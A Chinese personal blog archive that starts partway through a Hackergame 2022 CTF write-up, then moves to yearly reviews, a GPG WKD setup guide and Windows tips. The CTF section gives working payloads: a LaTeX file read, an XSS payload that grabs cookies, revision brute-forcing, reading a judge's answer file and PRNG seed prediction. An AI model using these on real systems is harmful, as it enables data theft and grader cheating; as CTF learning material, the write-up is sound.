还好是国内航班，且航班号数字是三位。最终得到降落机场为HIJ，航班号为NH683。

猜数字

通过查看源码，发现要让 isTalented 的值为 1，就需要控制一次猜中的误差在1e-6/2以内。

没有发现办法可以让服务器忘记上一次我猜过的状态。多次尝试后， 我不猜了， 猜测NaN，然后就拿到了 flag。

只要我猜测足够多次，就一定有一次是直接猜中的。此服务器幸免于难（x

LaTeX 机器人

纯文本

找到Hacking with LaTeX，提交\input{/flag1}，得到 flag。

特殊字符混入

通过阅读 Reading files containing # characters 和 Read strings from file that contains the special character #，找到可以使用 TeX/catcode来控制 TeX 遇到特殊字符时的行为。

payload：

1
2
3
4
5
6
7

\newread\file
\openin\file=/flag2
\catcode`\#=11
\catcode`\_=11
\read\file to\line
\line
\closein\file

Flag 的痕迹

页面的 Revisions 被关闭了，但是查看特定 rev 还是可以使用的。

使用 苏卡卡 CC 攻击大法，通过找到特定 rev 来获取 flag。

1
2
3
4
5
6
7
8
9
10
11

import requests
headers = {} # 略
s = requests.Session()
host = "http://202.38.93.111:15004/"
for rev in range(1666396800, 1659244370, -1):
    print(rev)
    resp = s.get(f'{host}doku.php?rev={rev}',
                 headers=headers)
    if 'No such revision' not in resp.text:
        print(resp.text)
        exit()

找到 rev 有 [1665224447, 1665224461, 1665224470]，其中 1665224461 有 flag。

救救服务器！另一种解法是使用比较功能（do=diff），可以直接得到 Revisions…

安全的在线测评

无法 AC 的题目

阅读判题脚本后可以发现，静态数据的输入在data/static.in中，输出在data/static.out中。写一个 C 程序，读取data/static.out并输出就可以 AC 了。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19

#include <stdio.h>
#include <stdlib.h>

int main() {
  FILE *fptr;
  char c;
  fptr = fopen("./data/static.out", "r");
  if (fptr == NULL) {
    printf("Cannot open file \n");
    exit(1);
  }
  c = fgetc(fptr);
  while (c != EOF) {
    printf("%c", c);
    c = fgetc(fptr);
  }
  fclose(fptr);
  return 0;
}

动态数据因为读不到（为什么会变成这样呢？有了 0700 权限的动态输入，有了 0700 权限的动态输出，两份快乐的事情重合在一起；而这两份快乐，又给我带来更多的快乐。得到的，本该是……），不知道怎么 AC。

线路板

打开 Gerber 文件，略微调节，发现 flag。（我使用的是 KiCad Gerber Viewer）

Flag 自动机

运行 exe，发现“狠心夺取”按钮会避开鼠标，不让我点击。那么我使用触摸屏是不是就可以了呢？

很快啊，一个远程桌面配置，一个手机连接，发现可以点击到了。按传统功夫的“点”到为止它已经输了，应该给我 flag。

我关远程桌面的时间不点了，它突然告诉我“您不是本机的超级管理员”（我在使用 Administrator 账户）。我大意了啊，没有逆向改它函数。这个 flag 自动机不讲武德，我劝它好自为之，好好反思，以后不要再犯这样的小聪明。

后续通过逆向并 Patch Program 得到 flag。 不会 binary 题，调了好几个小时

微积分计算小练习

打开练习网站，发现有 5 道微积分计算题。 那么就先把它们都做出来吧

代码使用 SageMath，题目要求四舍五入，保留一位小数，可以使用round函数。（不想做题可以跳过此部分）

1
2
3
4
5
6
7

from sage.symbolic.integration.integral import definite_integral    # 导入定积分函数
definite_integral(1/(x**2+1),x,0,1)                                 # 第一题
lim(sin(x)/x,x=0)                                                   # 第二题
definite_integral(e**(-2*x**2),x,-oo,oo)                            # 第三题
definite_integral(arcsin(1/10),x,0,1)                               # 第四题
derivative(cos(x)/sin(x),x)(x=114)                                  # 第五题
answers = [0.8, 1.0, 1.3, 0.1, -1.6]                                # 答案

成功获得了 100 分。

从微积分的世界返回到 CTF 的世界，调试网页并阅读后端源码发现：

• 成绩页面存在 XSS 漏洞。
• 成绩页面的姓名与分数在 URL param 的 result 中通过 base64 编码。（以及 URL Encode）
• 提交练习成绩的页面会使用 selenium 控制 Chrome，打开成绩页面处理成绩后输出。
• flag 在后端 Chrome 的 cookie 中。

构造 payload 如下：

1
2
3
4
5
6
7

<img
  src="x"
  onerror="document.getElementById('greeting').innerText=document.cookie;"
/>:<img
  src="x"
  onerror="document.getElementById('score').innerText=document.cookie;"
/>

通过 base64 编码，URL Encode 后，修改 URL 并在提交练习成绩的页面提交，得到 flag。

杯窗鹅影

flag1

写一个 C 程序，读取/flag1并输出。使用x86_64-w64-mingw32-gcc编译并上传。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19

#include <stdio.h>
#include <stdlib.h>

int main() {
  FILE *fptr;
  char c;
  fptr = fopen("/flag1", "r");
  if (fptr == NULL) {
    printf("Cannot open file \n");
    exit(1);
  }
  c = fgetc(fptr);
  while (c != EOF) {
    printf("%c", c);
    c = fgetc(fptr);
  }
  fclose(fptr);
  return 0;
}

原来可以读到的吗，震撼我一整年

flag2

在 GitHub 搜索 wine exploit，找到 schlafwandler/attacking_wine 仓库。

使用Part_I/exec_shellcode.c中的代码，替换 shellcode，编译并上传，得到 flag。

蒙特卡罗轮盘赌

题目需要猜测程序运行结果，五局三胜。阅读源代码，发现其使用时间作为伪随机数生成器的种子，因此可以在本地生成最近时间的随机数。

先修改原来的代码，使其在有参数时，使用 argv[1]作为种子，否则使用当前时间作为种子。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>

double rand01() { return (double)rand() / RAND_MAX; }

int main(int argc, char **argv) {
  // disable buffering
  setvbuf(stdin, NULL, _IONBF, 0);
  setvbuf(stdout, NULL, _IONBF, 0);
  setvbuf(stderr, NULL, _IONBF, 0);

  unsigned long seed = (unsigned)time(0) + clock();
  if (argc > 1) {
    seed = atoi(argv[1]);
  }
  srand(seed);

  int games = 5;
  int win = 0;
  int lose = 0;
  char target[20];
  char guess[2000];
  for (int i = games; i > 0; i--) {
    int M = 0;
    int N = 400000;
    for (int j = 0; j < N; j++) {
      double x = rand01();
      double y = rand01();
      if (x * x + y * y < 1)
        M++;
    }
    double pi = (double)M / N * 4;
    sprintf(target, "%1.5f", pi);
    guess[7] = '\0';
    printf("%1.5f,", pi);
  }
  printf("\n");
  return 0;
}

编译后写一个 python 程序调用它生成最近时间作为种子的随机数，并输出到文件中。

1
2
3
4
5
6
7
8
9
10
11
12
13
14

import os
import time
def getans(seed):
    ans = os.popen(f"./pwncarlo {seed}").read().strip()[:-1].split(",")
    return ans  # list of 5 answers
monte_carlo = []
time_stamp = int(time.time())
for seed in range(time_stamp - 1000, time_stamp + 1500):
    print(seed)
    monte_carlo.append(getans(seed))

with open("monte_carlo.txt", "w") as f:
    for i in monte_carlo:
        f.write(",".join(i) + "\n")

基于服务器给出的前两次结果，推测出后三次的结果，从而得到 flag。

惜字如金

HS384

先尝试补全被惜字如金化的代码，如果使用具有代码补全和错误检查功能的 IDE 会更方便。发现secret = b'ustc.edu.cn'和它的 sha384 被惜字如金化了。已知secret长度为 39。阅读惜字如金化规则，找出所有可能的secret，并计算它们的 sha384，生成类似于彩虹表的文件。

1
2
3
4
5
6
7
8
9
10
11
12

from hashlib import sha384
import itertools

f = open("/tmp/HS384rainbow.csv", "w")
for vec in itertools.product(range(1, 35), repeat=6):   # fxxk referer
    for vec2 in itertools.product(range(2), repeat=2):  # fxxk creat
        if sum(vec) + sum(vec2) == 34:
            secret = 'u' + vec[0] * 's' + vec[1] * 't' + vec[2] * 'c' + vec2[
                0] * 'e' + '.e' + vec[3] * 'd' + 'u.' + vec[4] * 'c' + vec[
                    5] * 'n' + vec2[1] * 'e'
            f.write(secret + ',' + sha384(secret.encode()).hexdigest() + '\n')
f.close()

单线程 python 慢慢地跑了十几分钟，生成了 106MB 的文件。 Python 3.14 将比 C++ 还快（误） 运行结束后在表中查找与题目给出的 sha384 值相似的值，得到secret是usssttttttce.edddddu.ccccccnnnnnnnnnnnn。

把secret和secret_sha384填入HS384.py，并用它来签名所需签名的数据，提交后得到 flag。

光与影

因为我在 Linux 环境下的 Chromium 无法正常渲染，所以使用 Firefox 和 Charles 来调试。

通过不断调试fragment-shader.js，最终可以得到 flag 的重写规则为：

1
2

<   vec4 pTO = mk_trans(35.0, -5.0, -20.0) * mk_scale(1.5, 1.5, 1.0) * pH;
>   vec4 pTO = mk_trans(35.0, -5.0, -2.0) * mk_scale(1.5, 1.5, 1.0) * pH;

在截图中，我还启动了以下重写规则，不影响 flag 查看。

1
2

<   return vec3(0.0, 0.0, 0.0);
>   return rayD;

片上系统

引导扇区

使用 PulseView 打开 zip 文件，点击Add protocol decoder，选择SD card (SPI mode)，配置解码器参数后，在Binary Decoder Output View中可以看到 flag。

量子藏宝图

呜呜，不懂量子

第一章要求使用名为 BB84 的量子密钥分发协议，协商出密钥。多次尝试后我的做法是制备基底填写 30 个x，量子态填写 30 个0。提交量子态后，根据返回的测量基底中的x的个数，填写相应个数的0。（如果制备基底填写+就填写返回的测量基底中的+的个数的0）

第二章给出了一个藏有 flag 的 Bernstein-Vazirani 算法的量子电路图。我哪里懂什么量子电路图呢，只好先把电路图按行转写成了这样的格式，总共为 128 行，图中最后一行暂时不管，节点使用+表示。以下为末 8 行：

1
2
3
4
5
6
7
8

0
x+x
+
0
0
+
zz+
0

因为最后一行是左边是 x，按照电路加入到前面的规则的话，就把+替换成了 x，末 8 行如下：

1
2
3
4
5
6
7
8

0
xxx
x
0
0
x
zzx
0

已知FLAG 是 flag{...} 的形式，使用 ASCII 编码，按大端序存储。q_127 对应第一个比特，那么需要把每行二值化。又已知部分明文（flag{和}），调试后使用以下代码输出二进制：

1
2
3
4
5
6
7
8
9

with open('q2.txt', 'r') as f:
    q = f.read().splitlines()
q = q[::-1]
for i in q:
    if i == '0' or i == 'xx':
        print('0', end='')
    else:
        print('1', end='')
print()

得到结果（为使结果美观添加了空格和换行）：

1
2
3
4

01100110 01101100 01100001 01100111
01111011 01100101 00110010 01100010
00110010 00110010 01100010 01100001
00110110 00110110 01100010 01111101

使用 ASCII 转换为字符后得到 flag。

企鹅拼盘

这么简单我闭眼都可以

需要输入四位二进制数，总共也就 16 种可能，直接手动枚举即可。

大力当然出奇迹

通过修改 Python 源代码，使chal函数增加一个参数，输入 16 位二进制元组，并修改使它直接输出info字典，通过字典中的scrambled判断是否成功。

1
2
3
4
5
6

for input_tuple in itertools.product([0, 1], repeat=16):
    info = chal(16, True, input_tuple)
    print(input_tuple)
    if info['scrambled']:
        print("".join(map(str, input_tuple)))
        break

火眼金睛的小 E

有手就行

手动使用 BinDiff 完成。

后续题目试了好几天，可惜没能解出来，只差 bindiff 的命令行输入和输出了。找到了 ida_haru 但是没成功跑起来。

以下是不完整的解题代码：

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57

import os
import requests
import pwn
tmp_dir = r'hackergame/tmp'
conn = pwn.remote('202.38.93.111', 12400)  # connect to the server
def wipe():
    for file in os.listdir(tmp_dir):
        os.remove(os.path.join(tmp_dir, file))
def recv_and_print(line_num):
    for i in range(line_num):
        text = conn.recvline().decode('utf-8').strip()
        print(text)
def choose_difficulty(difficulty):
    for i in range(4):
        text = conn.recvline().decode('utf-8').strip()
        print(text)
    conn.sendline(str(difficulty).encode())
def challenge():
    urls = {
        '1': None,
        '2': None,
    }
    while True:
        text = conn.recvline().decode('utf-8').strip()
        print(text)
        if text.startswith('1st binary'):
            urls['1'] = text.split(' ')[-1]
        elif text.startswith('2nd binary'):
            urls['2'] = text.split(' ')[-1]
        elif text.startswith('Please show me the address of that function'):
            break
    assert urls['1'] is not None and urls['2'] is not None
    return urls

token = open('token', 'r').read()
conn.sendlineafter('Please input your token: ', token.encode())
difficulty = 2
challenges = 100
choose_difficulty(difficulty)
conn.sendlineafter(
    r'Do you want to perform dry run, so that you can see how many challenges you can answer correctly? (y/N)',
    b'N')
recv_and_print(5)
timestamp = input('Please input the timestamp: ')
conn.sendlineafter('Please input the timestamp:', timestamp.encode())
recv_and_print(2)
for i in range(challenges):
    wipe()
    challenge_urls = challenge()
    for i, url in challenge_urls.items():
        r = requests.get(url)
        with open(os.path.join(tmp_dir, f'file{i}'), 'wb') as f:
            f.write(r.content)
        os.system(f"idat64.exe -B -P+ {os.path.join(tmp_dir, f'file{i}')}")
    address = input() # TODO
    conn.sendline(address.encode())
conn.interactive()

总结

比赛好卷，不懂 math 不懂 binary 卷不过但是上榜了（）

在做“蒙特卡罗轮盘赌”题目的时候，发现正好度过了时间Tue 25 October 2022 02:57:46 UTC，其时间戳为1666666666！

明年可能会再来参加，希望到时候也能够顺利上榜。

参加 Hackergame 喵，参加 Hackergame 谢谢喵。

See also

• 参加 Hackergame 2022 的一些感想和部分题解 by 柏园猫

网站

可能因为免费域名的原因网站的 SEO 效果都不是很好。不过相对较短的免费域名还能自动续期成功，考虑到成本就没再购买域名。

博客

更新了 4 篇日志 （几乎都在水） 。谢谢现在还在看我这篇博文的你。

关于页面

用多语言重写了关于页面。

其它站点

通过一些开源站点重部署建立了一些站点，但尚未从零开始写过站点。

计算机、电子设备相关

其实就是玩

硬件

手机和笔记本没有更换，不过更换了电池。

买了一些新硬件：

• Baofeng DM-5R Tier II
• RTL-SDR Blog V3 及一些天线
• 黑群晖 NAS DS120j

第一次学习了表面安装器件（SMD）的焊接，完善了相应工具。除了 BGA 大概都学会了焊接（然而弄坏了好几个 STM32 当学费）。自从 7 月开始，JLC 可以免费打样，就经常打一些 PCB。其实还是配 BOM 贵

软件

笔记本系统

由于黑苹果在我的笔记本上天天让风扇转不停，性能也不如从前，就更换到最好的 Arch Linux。在两个系统都打了几个软件包（Homebrew 和 AUR）。

尽管没有 macOS 视觉上的统一、每个程序都有的各种快捷键、各种非全平台专有软件，习惯 Arch Linux 后使用体验还是很好的。

期间由于在挂载状态迁移硬盘，然后又乱重建 btrfs 树，分区炸过一次。被迫自下而上重建了 Arch Linux（仍然使用 btrfs）

相比之下 Windows 11 更了个什么东西

其它

折腾了一些上文提到的以及其他硬件（比如电视机机顶盒和交换机），也随便玩玩了 ESP32 和 Arduino。

程序和代码

继续写着 Python… 只是糊的更好看了一些。

算法题还是不会做。

• 634 contributions in 2021
• 2021 GitHub Skyline

CTF

组队参加过一次 CTF，就解出来半道题，后来还是 Esonhugh 帮我解了后半部分。还是太菜了呜呜呜，连 Hackergame 都没参加。

DN42

使用免费试用的 VPS 仅单节点让 AS4242421032 平稳运行了一年。（快要到期了，我要怎么办）

语言

日语

虽然只是学完了标日初级和不多的其它的书，刷了刷网上 2021/7 的 N2 测试题倒是平稳通过了。日常使用更熟练一些了。在 12/31 第一次看了紅白戦的直播。在 2022 将会使用日语作为高考外语语种。

世界语

~~为了在玩ことのはアムリラート时可以解密异世界语言，学习了一周世界语。语法简单但外来词多，使用人数少，一点都不世界。~~可能还会持续学习下去。

ACGN

收视进度

开始使用 Bangumi 管理收视进度（原先记录于关于页面）。

看过：

• 響け! ユーフォニアム 系列（含 リズと青い鳥）
• HELLO WORLD
• 氷菓
• 劇場版 ヴァイオレット・エヴァーガーデン

玩过：

• PARQUET
• かたわ少女
• ことのはアムリラート
• Stellaris
• FlightGear
• SimplePlanes

读过：

• 吾輩は猫である
• 氷菓
• 時生
• 分身
• 名探偵の掟
• 風の歌を聴け
• ラヴレター
• The Rediscovery of Man

收藏

通过 Tweet2Telegram、nazurin 等 bot 在某个插画频道中推送了 5373 张插画，文件大小约 4.7GB，说多不算多，说少也不少。

非常感谢这些画师和部分频道提供了上游来源，以及如 SauceNAO 和 ASCII2D 提供的插画来源检索服务。

以下做一些分析娱乐一下。

由于插画来源多、数量多，分析时通过使用 DeepDanbooru AI 为插画统一打标签。

以下是通过各插画标签的置信度和生成的词云。

通过 总体标签置信度和向量 与 插画标签向量置信度向量 数乘后排序，选择出了一些具有总体标签特征的插画，结果发布在该频道。

所以为什么不根据自己 xp 挑选呢

身边事

几乎没怎么受到 COVID-19 疫情的影响，就度过了一年。

比赛多少参加了一些，最终离开了学校的社团，进入高三。因为自己的选科，多出了大把时间。

高考分数线还是很遥远，等级考的成绩也不是很好。面对即将到来的高考，听着他人的加油助威，持续摸鱼，不知何去何从。

写于 Jan 3，春考前 1 周内。

1

gpg --locate-key admin@apeiria.net

起因

前些日子想把原来的 RSA 公钥全部更换为 ECC 公钥，便重新生成了新的主密钥。

1
2
3
4
5
6
7
8
9

$ gpg --list-keys C4B71F9ED3515AEB8270D5D7189BB387CF3AD95F
pub   ed25519 2021-05-15 [C] [expires: 2024-01-01]
      C4B71F9ED3515AEB8270D5D7189BB387CF3AD95F
uid           [ultimate] 欠陥電気RadioNoise (御坂13514号のECC鍵) <Misaka13514@gmail.com>
uid           [ultimate] Misaka13514 <Misaka13514@gmail.com>
uid           [ultimate] Misaka <admin@apeiria.net>
sub   ed25519 2021-05-16 [S] [expires: 2024-01-01]
sub   ed25519 2021-05-16 [A] [expires: 2024-01-01]
sub   cv25519 2021-05-16 [E] [expires: 2024-01-01]

生成完就需要发布公钥供他人交换。以前我使用的是公钥服务器+在网页或其它平台发布公钥的下载链接或是公钥指纹的最后几位。

假设有一个人只有我的邮箱信息而想要给我发送加密邮件，一般来说有这些交换方法，它们似乎仍不够快速或是不够安全。

• 面对面交换显然太繁琐了。
• gpg --recv-keys只能通过指纹从公钥服务器获取公钥。使用这个命令需要先通过其它途径知道正确的指纹。
• 如果发布到 Web 或是 代码仓库 ，需要先在网页上查找到对应 URL 并下载。
• 看见有人使用特殊方法生成了带有靓号指纹的密钥。碰撞出相同一部分指纹的密钥是有可能做到的。
  （建议公开至少 64bit (16 位 16 进制)的指纹）
• gpg --search-keys可以通过邮箱在公钥服务器搜索与下载。但公钥服务器接受任何人上传的公钥，任何人可以生成含有我的邮箱标识的密钥并发布。
  （现在如keys.openpgp.org等服务器会在上传公钥后向对应邮箱发送验证邮件来验证身份）

正如 IPv6 与 DNS 那样，有一个靓号不如配置了方便有效的交换方式。

于是我寻找了其他发布公钥的途径，有DNS CERT、DANE、Web Key Directory (wkd)、LDAP、NTDS等。关于这些方法的说明可以man gpg或是在GPG 文档中看到。

我选择了Web Key Directory (wkd)方法，它也是默认启用的除本地外的唯一一种方法。下面将以我的密钥为例，自己部署 WKD。你也可以使用在自己域名上使用第三方提供的服务。如果你使用的邮箱的域名已经提供了这样的服务，你可以跳过下面的步骤。

自己部署

条件

• 有可以修改记录的域名
  需要修改 apex 顶级域名或是 openpgpkey 子域名记录
• 使用该域名邮箱
• 有可使用的网页服务器或可信的第三方托管服务
• GPG 版本 >= 2.2.12 （或自行查看官方文档中的其他可用客户端）

创建 WKD 文件夹

创建一个文件夹，并作为openpgpkey.your.domain的站点根目录。然后创建 WKD 的目录结构。

下面的部分命令需要根据你的情况来修改。

1
2
3
4
5
6

$ mkdir openpgpkey-WKD && cd openpgpkey-WKD
$ mkdir -p .well-known/openpgpkey
$ cd .well-known
$ gpg --list-options show-only-fpr-mbox -k "@your.domain" | $(gpgconf --list-dirs libexecdir)/gpg-wks-client -v --install-key
#如果需要，也可以替换为指定单个 Key
$ cd ..

输出将会类似这样

1
2
3
4
5
6
7

gpg-wks-client: gpg: Total number processed: 1
gpg-wks-client: using key with user id 'Misaka <admin@apeiria.net>'
gpg-wks-client: gpg: Total number processed: 1
gpg-wks-client: directory 'openpgpkey/apeiria.net' created
gpg-wks-client: directory 'openpgpkey/apeiria.net/hu' created
gpg-wks-client: policy file 'openpgpkey/apeiria.net/policy' created
gpg-wks-client: key C4B71F9ED3515AEB8270D5D7189BB387CF3AD95F published for 'admin@apeiria.net'

站点目录结构将会类似这样

1
2
3
4
5
6
7

$ tree -a
.
`-- openpgpkey
    `-- apeiria.net
        |-- hu
        |   `-- 4y36rkzdjnzmk3oxaekyi5biowgr5kcz
        `-- policy

在 GitHub Pages 上发布

你也可以使用其它任何你喜爱的 Web 托管方式。

在 GitHub 上创建一个公开仓库。

1
2
3
4
5
6
7
8
9
10
11

$ touch .nojekyll
$ echo "openpgpkey.your.domain" > CNAME
$ git init && git add . && git commit -m "Initial commit"
Initialized empty Git repository in ~/openpgpkey-WKD/.git/
[main (root-commit) 114514 ] Initial commit
 3 files changed, 3 insertions(+)
 create mode 100644 .well-known/openpgpkey/your.domain/hu/1145141919810aaaaaa
 create mode 100644 .well-known/openpgpkey/your.domain/policy
 create mode 100644 CNAME
$ git remote add origin your-url
$ git push -u origin your-branch-name

将域名记录按照 GitHub 文档指向 GitHub Pages，然后到 GitHub 上启用 GitHub Pages，可以访问对应 URL 查看是否生效。

使用第三方服务

部分网站如keys.openpgp.org提供了 WKD as a Service 的服务。

在网站上上传自己的公钥后，就可以使用它提供的服务了。

只需添加这样一条CNAME记录：将openpgpkey.your.domain指向wkd.keys.openpgp.org。

测试

1
2
3
4
5
6
7
8
9
10
11

$ gpg --no-default-keyring --keyring /tmp/gpg-$$ \
    --auto-key-locate clear,wkd,nodefault --verbose --locate-key you@your.domain
gpg: key 189BB387CF3AD95F: public key "Misaka <admin@apeiria.net>" imported
gpg: Total number processed: 1
gpg:               imported: 1
pub   ed25519 2021-05-15 [C] [expires: 2024-01-01]
      C4B71F9ED3515AEB8270D5D7189BB387CF3AD95F
uid           [ unknown] Misaka <admin@apeiria.net>
sub   ed25519 2021-05-16 [S] [expires: 2024-01-01]
sub   ed25519 2021-05-16 [A] [expires: 2024-01-01]
sub   cv25519 2021-05-16 [E] [expires: 2024-01-01]

推荐阅读

2021 年，用更现代的方法使用 PGP by UlyC

1. PGP 基础
2. 安全使用
3. 公钥的发布与交换

参考

• Web Key Directory
• Hosting a Web Key Directory (without dynamic WKS)
• Hosting a Web Key Directory
• Hosting a Web Key Directory on GitHub Pages
• GPG Configuration Options

目前已成为稳定功能。

• 官方介绍
• 官方文档

我在 2021/2 就通过了申请，开始使用这一平台。

免费计划：

• 不能并行构建站点
• 每月最多构建 500 次
• 无站点数量限制
• 无请求数限制
• 无带宽限制

嗯，够用。

特点

• 网页性能较好
• 配置简单
• 开发环境与生产环境分离
• CI/CD 自动化
• 支持绑定多域名

使用时遇到的问题

• 创建项目无法删除
• 无法使用免费域名
• 必须使用 GitHub 的仓库
• 自动从所有分支构建，无法忽略部分分支
• 设置自定义域名后，不能设置访问默认域名后自动跳转自定义域名
• 不添加Access-Control-Allow-Origin header，可能造成跨域访问异常
• Known issues

开始使用

点这里开始

• 如果没有 Cloudflare 帐号，你需要注册一个。
• 如果页面语言不符合你所需要的语言，可以在右上角切换。
• 目前只能从 GitHub 仓库源码构建页面，所以你需要一个放有项目源码的 GitHub 仓库，并同步更新修改。（可能需要 Git 基础）

注册后，你需要将 GitHub 全部仓库或部分仓库的访问权限授予 Cloudflare Pages。如果未来想修改，可以在 GitHub 调整设置。

配置

Cloudflare Pages 比较易于配置。由于以前有过配置 CI/CD 的相关经验，且源码也已在 GitHub 上同步，在配置上我没遇到什么问题。

较 GitHub Actions 相比，Cloudflare Pages 配置更简单一些（自由度也少一些）

打开Cloudflare 网页 配置面板，在这里你可以查看和修改你目前的项目使用情况。

创建并配置一个新项目

点击创建项目，选取项目所在仓库。

然后设置构建和部署

• 给项目起一个名称

  如果与其它项目名不冲突，它将成为默认访问域名的一部分。即*.pages.dev

• 选择生产分支

  从这个分支获取的代码将会部署到生产环境，其它分支的代码将会部署到开发环境。

• 构建设置

  有许多默认预设可选。如果预设不起作用或是你使用特殊配置，需要手动配置。

  我使用最多的构建命令是yarn build和npm run build。使用最多的构建目录是public和dist。你可以先在本地测试。
  如果不需要构建过程，根目录就是要部署的网页：构建命令留空，构建目录设置为/

• 根目录、环境变量设置

  一般不需要设置，可以根据你的需求设置。

设置自定义域名

在项目设置中点击自定义域，点击设置。

输入你想使用的域名，然后修改对应 DNS 记录：CNAME 到 Cloudflare 分配的默认域名。（如果域名解析托管在 Cloudflare 则会自动设置。

性能效果测试

我使用PageSpeed Insights来测试网页性能表现。

以下是我 blog 的测试成绩

以下数据来自UptimeRobot

已将 blog 迁移至 Cloudflare Pages，要是发现 blog 有什么异常欢迎联系我反馈。(◍•ᴗ•◍)❤

标题虽然是 2020，但从 2020/12 咕到了 2021/2（故文中信息以编写时间为准

Learnt

学习的内容几乎都是随用随学，不成体系

欢迎推荐教材

General

git

• 90 contributions in 2020 on GitHub
• 2020 GitHub Skyline
• 2021 GitHub Skyline

从只会add、commit、push

到 rebase、多 branch、多 remote 、force push、带来一堆 conflicts、篡改 git 历史、冒用他人信息 commit

Program

学习了一些 Python

• 基础语法
• 数据分析
• 爬虫

日常不怎么写，编写时需要随时看文档复制，经常会写os.system这种能用就行的代码（

似乎从未贡献代码 太菜了

在比赛中会尝试写 C

对以下语言有了似懂非懂的了解

• css
• javascript
• php
• swift
• C
• MySQL

CTF

比较擅长 misc，crypto 和 web 一般般，Assembly、Executable、Pwn 和 Reverse 都下手

个人感觉比 OI 有趣

比赛参加的不多，感觉总是比别人需要用更多的时间，会跟题过不去~~，自己卷自己~~

想找人一起打比赛哇

Amateur Radio

学习了一些电子电路知识和业余无线电通信简语

拿到了中国业余无线电 B 证

30Mhz 以下的业余频段也能使用了（大概没机会用）

背完了莫尔斯码和字母表示法

实际操作能力仍有欠缺

设备有 DM-5R 和 RTL-SDR

申请电台执照因年龄不足而被拒绝

Japanese

日常听歌看番都需要日语，而且我所在的上海日语浓度感觉挺高的（可以去下面的文章看看），所以在学习，大概有点进步（

上海之旅 by LovelyWei

标日初级仍在学习中

主要会在 Twitter 使用，有时在 Telegram 也会使用~~，甚至能用日语跟乌克兰人交流~~

总喜欢把多种语言混合在一起用

Double Pinyin

学习并使用小鹤双拼

提升了打字效率

（然而连指法都不会）

Social

不去比较数字

对于每一位 Follower 我都表示感谢

（去除了减的部分）

自制图，因为还没到 50 人，看不到官方统计

加入了许多群，认识了许多人

虽然很少主动发起聊天，但是要是想找我随时欢迎 w

Site

一句话总结：fork, modify, deploy

建立了博客、关于、主页等等页面

别人好看的页面被我看上后下一秒就是我的了

写了 11 篇文章

Sitemap

没钱钱买域名，moeneko.xyz无力续费，更换为免费域名atri.tk

ACG

完成了

• とある科学の超電磁砲 T
• ヴァイオレット・エヴァーガーデン
• ヴァイオレット・エヴァーガーデン 外伝 - 永遠と自動手記人形 -
• ご注文はうさぎですか？
• ご注文はうさぎですか？？
• かぐや様は告らせたい ～天才たちの恋愛頭脳戦～
• かぐや様は告らせたい？～天才たちの恋愛頭脳戦～
• マギアレコード 魔法少女まどか ☆ マギカ外伝
• デート・ア・バレット デッド・オア・バレット
• デート・ア・バレット ナイトメア・オア・クイーン
• 泣きたい私は猫をかぶる
• プラスティック・メモリーズ
• ネコぱら
• ネコぱら vol.4 ネコとパティシェのノエル
• ATRI -My Dear Moments-
• サノバウィッチ
• 千恋＊万花 （未全通）
• RIDDLE JOKER
• 喫茶ステラと死神の蝶 （未全通）
• リトルバスターズ！
• リトルバスターズ！エクスタシー （100% CG 达成）
• クドわふたー
• 美少女万華鏡 ―呪われし伝説の少女―
• 美少女万華鏡 ―忘れな草と永遠の少女―
• 美少女万華鏡 ―神が造りたもうた少女たち―
• 美少女万華鏡 ―理と迷宮の少女― （未全通）

在看

• ご注文はうさぎですか？BLOOM
• リトルバスターズ！～ Refrain ～
• リトルバスターズ！EX

想看&搁置了

• 劇場版 ヴァイオレット・エヴァーガーデン
• CLANNAD
• 智代アフター ～ It’s a Wonderful Life ～
• 美少女万華鏡 ―罪と罰の少女―
• ATRI -My Dear Moments- （REPLAY）
• ドラクリオット！
• 天色＊アイルノーツ
• あまいろショコラータ
• ネコ神さまと、ななつぼし -妹の姉-

macOS 内置的输入法虽然不能自定义双拼键位，但含有我正在使用的小鹤双拼方案。

在「设置」应用中逐个添加

Win10 安装微软拼音输入法后默认只含有这些双拼方案：

• 微软双拼
• 智能 ABC
• 自然码

打开「设置」，进入时间和语言，在区域和语言中点击中文-选项，添加微软拼音输入法（如果未出现），随后点击选项-常规，将拼音设置修改为双拼。在下方创建自定义双拼方案并逐个绑定键位。如果不清楚键位可以看图对应设置。

使用「注册表编辑器」修改对应注册表

右键Windows徽标，选择运行（快捷键：Win+R）

输入regedit打开注册表编辑器，跳转到以下路径:

1

HKEY_CURRENT_USER\SOFTWARE\Microsoft\InputMethod\Settings\CHS

新建字符串值UserDefinedDoublePinyinScheme0，并将值设置为小鹤双拼*2*^*iuvdjhcwfg^xmlnpbksqszxkrltvyovt

接下来去「设置」中将小鹤双拼设为默认，也可以直接继续修改注册表，最终注册表可能是这样：

直接导入注册表

懒人专用，点此下载并导入

文件内容：

1
2
3
4
5
6

Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\SOFTWARE\Microsoft\InputMethod\Settings\CHS]
"Enable Double Pinyin"=dword:00000001
"UserDefinedDoublePinyinScheme0"="小鹤双拼*2*^*iuvdjhcwfg^xmlnpbksqszxkrltvyovt"
"DoublePinyinScheme"=dword:0000000a

这个问题有多种方法可以解决

使用「设置」应用

在开始菜单中打开设置，进入网络和Internet，选择Wi-Fi

点击管理已保存的网络，找到需要删除的网络配置删除即可

使用命令行

如果你正在远程操作一台服务器或是习惯命令行的操作方式，这种方法会更快捷。

右键Windows徽标（快捷键：Win+X），选择命令提示符（管理员）或Powershell（管理员）

输入：

1
2

netsh wlan show profiles #显示网络配置
netsh wlan show all      #我 全 都 要

Profiles on interface *Wi-Fi*

其中的*Wi-Fi*是网络接口名称，不同设备可能显示结果不同

找到要删除的配置名称*Network*

使用以下命令删除

1

netsh wlan delete profile name="*Network*" interface="*Wi-Fi*"

显示已删除，再次查看网络配置，发现删除成功

使用「注册表编辑器」

以上方法可能并不能成功找到所有的配置，而使用「注册表编辑器」是一个彻底的方法。

右键Windows徽标（快捷键：Win+X），选择运行

（快捷键：Win+R）

输入regedit打开注册表编辑器，找到如下路径:

1

